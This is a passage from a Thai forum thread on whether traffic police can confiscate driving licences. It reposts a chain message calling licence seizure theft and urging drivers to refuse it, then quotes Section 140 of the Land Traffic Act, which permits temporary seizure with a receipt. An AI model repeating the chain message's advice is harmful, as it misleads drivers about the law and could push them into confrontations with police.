เมื่อเจ้าพนักงานจราจรหรือพนักงานเจ้าหน้าที่พบว่าผู้ขับขี่ผู้ใดฝ่าฝืนหรือไม่ปฏิบัติตามบทแห่งพระราชบัญญัตินี้ หรือกฎหมายอันเกี่ยวกับรถนั้นๆ จะว่ากล่าว ตักเตือนผู้ขับขี่ หรือออกใบสั่งให้ผู้ขับขี่ชำระค่าปรับตามที่เปรียบเทียบก็ได้ ในกรณีที่ไม่พบตัวผู้ขับขี่ก็ให้ติดหรือผูกใบสั่งไว้ที่รถที่ผู้ขับขี่เห็นได้ง่าย สำหรับความผิดที่กำหนดไว้ในมาตรา ๑๕๗/๑ มาตรา ๑๕๙ มาตรา ๑๖๐ มาตรา ๑๖๐ ทวิ และมาตรา ๑๖๐ ตรี ห้ามมิให้ว่ากล่าวตักเตือนหรือทำการเปรียบเทียบ ในการออกใบสั่งให้ผู้ขับขี่ชำระค่าปรับตามที่เปรียบเทียบตามวรรคหนึ่ง เจ้าพนักงานจราจรหรือพนักงานเจ้าหน้าที่จะเรียกเก็บใบอนุญาตขับขี่ไว้เป็นการชั่วคราวก็ได้ แต่ต้องออกใบรับแทนใบอนุญาตขับขี่ให้แก่ผู้ขับขี่ไว้ และเจ้าพนักงานจราจรหรือพนักงานเจ้าหน้าที่ต้องรีบนำใบอนุญาตขับขี่ที่เรียกเก็บไว้ไปส่งมอบพนักงานสอบสวนภายในแปดชั่วโมง นับแต่เวลาที่ออกใบสั่ง ใบรับแทนใบอนุญาตขับขี่ที่ออกให้ตามวรรคสามให้ใช้แทนใบอนุญาตขับขี่ได้เป็นการชั่วคราวไม่เกินเจ็ดวัน เมื่อเจ้าพนักงานจราจรหรือพนักงานเจ้าหน้าที่ หรือพนักงานสอบสวนได้ว่ากล่าวตักเตือนหรือทำการเปรียบเทียบปรับและผู้ขับขี่ได้ชำระค่าปรับตามที่เปรียบเทียบแล้ว ให้คืนใบอนุญาตขับขี่ทันที ในกรณีเจ้าพนักงานจราจรหรือพนักงานเจ้าหน้าที่ออกใบสั่งแต่ไม่พบตัวผู้ขับขี่ ให้สันนิษฐานว่าเจ้าของรถหรือผู้ครอบครองรถเป็นผู้กระทำผิดดังกล่าว เว้นแต่สามารถพิสูจน์ได้ว่าผู้อื่นเป็นผู้ขับขี่ การกำหนดจำนวนค่าปรับตามที่เปรียบเทียบ ให้เป็นไปตามหลักเกณฑ์ที่อธิบดีกำหนด ใบสั่งและใบรับแทนใบอนุญาตขับขี่ ให้ทำตามแบบที่เจ้าพนักงานจราจรกำหนด”]
ทีมข่าว ภาคสนาม ประจำวันที่ 18 ต.ค.56 ***ใบขับขี่เป็นทรัพย์สิน ตำรวจไม่สามารถยึดได้**** ใบขับขี่เป็นทรัพย์สิน ตำรวจไม่สามารถยึดได้ มีประโยชน์สำหรับผู้ขับขี่ เมื่อเช้านี้ได้ฟังรายการ บันทึกสถานะการณ์ ทางวิทยุแห่งประเทศไทยตอน 8.00 น. วันนี้มีการสัมภาษณ์ คุณจาตุรงค์ ฉายแสง รองนายกรัฐมนครี เรื่องมาตรการความปลอดภัยในช่วงเทศกาล มีตอนหนึ่งที่ท่านพูดว่า ใบขับขี่เป็นทรัพย์สิน ตำรวจไม่สามารถยึดได้ ตำรวจออกใบสั่ง ให้ไปเสียค่าปรับ ถ้าหากยึดใบขับขี่ ถือเป็นการลักทรัพย์ แต่ความเป็นจริงทั้งในอดีตและในปัจจุบันนี้เวลาตำรวจทางหลวงหรือตำรวจจราจร และแม้แต่ตำรวจสายตรวจ หรือตามด่านต่างๆ เวลาเรียกรถเพื่อตรวจ มักจะขอดูใบขับขี่ และยึดเอาไป แล้วหาข้อหาให้ บางทีก็ยึดแล้วเดินเข้าป้อมเพื่อให้คนขับรถเข้าไปเจรจา บางทีก็ยึดโดยไม่ให้ใบสั่งแต่บอกให้ไปเอาที่สถานี บางทีก็ยึดไปพร้อมออกใบสั่ง เพื่อให้ไปเสียค่าปรับ ประชาชนส่วนใหญ่ งง วิธีการปฏิบัติของตำรวจ ต่อไปถ้าตำรวจจะยึดใบขับขี่ต้องไม่ยอมให้ ไป ถ้าตำรวจเอาไปจริงๆ ต้องแจ้งความข้อหาลักทรัพย์ เวลาทำผิดกฏจราจร ตำรวจก็ให้ใบสั่งได้อยู่แล้ว และใบสั่งมีความสำคัญมาก ผู้รับต้องไปเสียค่าปรับ ถ้าไม่ ไป ทางราชการก็มีมาตรการที่จัดการอยู่แล้ว เช่นไม่ต่อทะเบียนตัดคะแนน เมื่อได้อ่าน และรู้เช่นนั้นแล้ว กรุณาส่งต่อ เพื่อจะได้ไม่ต้องเสียเวลาเสียอารมณ์ ในเวลาขับรถเพื่อความปลอดภัย ตำรวจจราจรจะมีอำนาจยึดใบขับขี่หรือไม่ จากที่กล่าวมาแล้วข้างต้น จะเห็นว่า ใบขับขี่เป็นกรรมสิทธิ์ของเรา คนอื่นจะมายึดมายุ่งโดยไม่มีอำนาจตามกฎหมายไม่ได้ ดังนั้น หากตำรวจจะยึดใบขับขี่ในกรณีที่เราทำผิดกฎจราจรได้ ก็ต้องค้นหาว่าตำรวจอาศัยอำนาจตามบทบัญญัติใดแห่งกฎหมายที่จะยึดใบขับขี่ ทั้งนี้เพราะหลักกฎหมายทั่วไปมีว่า “เจ้าหน้าที่ของรัฐจะใช้อำนาจกระทบสิทธิและเสรีภาพของบุคคลไม่ได้ เว้นแต่จะอาศัยอำนาจที่กฎหมายบัญญัติไว้” ซึ่งหากไม่มีกฎหมายให้อำนาจไว้ ตำรวจก็จะยึดใบขับขี่ไม่ได้ หากยึดไปโดยไม่มีกฎหมายให้อำนาจก็อาจจะเป็นความผิดฐานลักทรัพย์ได้ อย่างไรก็ดี เมื่อค้นคว้าตัวบทกฎหมายก็พบว่า พระราชบัญญัติจราจรทางบก พ.ศ.๒๕๒๒ บัญญัติไว้ว่า “มาตรา ๑๔๐ เมื่อเจ้าพนักงานจราจรหรือพนักงานเจ้าหน้าที่พบว่าผู้ขับขี่ผู้ใดฝ่าฝืนหรือไม่ปฏิบัติตามบทแห่งพระราชบัญญัตินี้ หรือกฎหมายอันเกี่ยวกับรถนั้นๆ จะว่ากล่าว ตักเตือนผู้ขับขี่ หรือออกใบสั่งให้ผู้ขับขี่ชำระค่าปรับตามที่เปรียบเทียบก็ได้ ในกรณีที่ไม่พบตัวผู้ขับขี่ก็ให้ติดหรือผูกใบสั่งไว้ที่รถที่ผู้ขับขี่เห็นได้ง่าย สำหรับความผิดที่กำหนดไว้ในมาตรา ๑๕๗/๑ มาตรา ๑๕๙ มาตรา ๑๖๐ มาตรา ๑๖๐ ทวิ และมาตรา ๑๖๐ ตรี ห้ามมิให้ว่ากล่าวตักเตือนหรือทำการเปรียบเทียบ ในการออกใบสั่งให้ผู้ขับขี่ชำระค่าปรับตามที่เปรียบเทียบตามวรรคหนึ่ง เจ้าพนักงานจราจรหรือพนักงานเจ้าหน้าที่จะเรียกเก็บใบอนุญาตขับขี่ไว้เป็นการชั่วคราวก็ได้ แต่ต้องออกใบรับแทนใบอนุญาตขับขี่ให้แก่ผู้ขับขี่ไว้ และเจ้าพนักงานจราจรหรือพนักงานเจ้าหน้าที่ต้องรีบนำใบอนุญาตขับขี่ที่เรียกเก็บไว้ไปส่งมอบพนักงานสอบสวนภายในแปดชั่วโมง นับแต่เวลาที่ออกใบสั่ง ใบรับแทนใบอนุญาตขับขี่ที่ออกให้ตามวรรคสามให้ใช้แทนใบอนุญาตขับขี่ได้เป็นการชั่วคราวไม่เกินเจ็ดวัน เมื่อเจ้าพนักงานจราจรหรือพนักงานเจ้าหน้าที่ หรือพนักงานสอบสวนได้ว่ากล่าวตักเตือนหรือทำการเปรียบเทียบปรับและผู้ขับขี่ได้ชำระค่าปรับตามที่เปรียบเทียบแล้ว ให้คืนใบอนุญาตขับขี่ทันที ในกรณีเจ้าพนักงานจราจรหรือพนักงานเจ้าหน้าที่ออกใบสั่งแต่ไม่พบตัวผู้ขับขี่ ให้สันนิษฐานว่าเจ้าของรถหรือผู้ครอบครองรถเป็นผู้กระทำผิดดังกล่าว เว้นแต่สามารถพิสูจน์ได้ว่าผู้อื่นเป็นผู้ขับขี่ การกำหนดจำนวนค่าปรับตามที่เปรียบเทียบ ให้เป็นไปตามหลักเกณฑ์ที่อธิบดีกำหนด ใบสั่งและใบรับแทนใบอนุญาตขับขี่ ให้ทำตามแบบที่เจ้าพนักงานจราจรกำหนด”
ตอบ
หน้า 3 จาก 3
ไปที่: 
ติดต่อโฆษณา admin@civicesgroup.com
Copyright © 2008-2024 Civic ES Group. All rights reserved.